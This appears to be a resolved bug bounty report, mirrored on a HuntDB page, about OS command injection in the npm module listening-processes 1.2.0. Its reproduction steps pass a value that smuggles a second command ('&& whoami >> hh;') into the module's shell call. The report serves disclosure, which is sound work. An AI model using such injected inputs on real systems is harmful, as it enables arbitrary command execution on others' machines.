Loading HuntDB...

[listening-processes] Command Injection

Critical
N
Node.js third-party modules
Submitted None
Reported by notpwnguy

Vulnerability Details

Technical details and impact analysis

OS Command Injection
I would like to report Command Injection in listening-processes It allows an attacker to execute arbitrary commands. # Module **module name:** listening-processes **version:** 1.2.0 **npm page:** `https://www.npmjs.com/package/listening-processes` ## Module Description > A simple NPM module for retrieving pertinent info on processes which are listening on local ports, and for killing those processes using shell commands lsof, ps, and kill in the background. ## Module Stats 6 downloads in the last day 12 downloads in the last week 28 downloads in the last month # Vulnerability ## Vulnerability Description > An attacker can execute arbitrary commands by escaping the binaries used by the module since it uses bash commands. ## Steps To Reproduce: ``` $ node > const processes = require('listening-processes') > processes(`'Python && whoami >> hh;'`) /bin/sh: \s.*:[0-9]* (LISTEN): command not found { Python: [ { command: 'Python', pid: '14720', port: '8000', invokingCommand: '/usr/local/Cellar/python/3.7.0/Frameworks/Python.framework/Versions/3.7/Resources/Python.app/Contents/MacOS/Python -m http.server' } ] } ``` ``` $ cat hh notpwnguy ``` ## Patch > If you're able to provide a patch with the fix please post it in this section ## Supporting Material/References: > State all technical information about the stack where the vulnerability was found - OPERATING SYSTEM VERSION : Mac Os - NODEJS VERSION : v10.5.0 - NPM VERSION : 6.2.0 # Wrap up - I contacted the maintainer to let them know: N - I opened an issue in the related repository: N ## Impact Arbitrary Commands can be executed!

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

OS Command Injection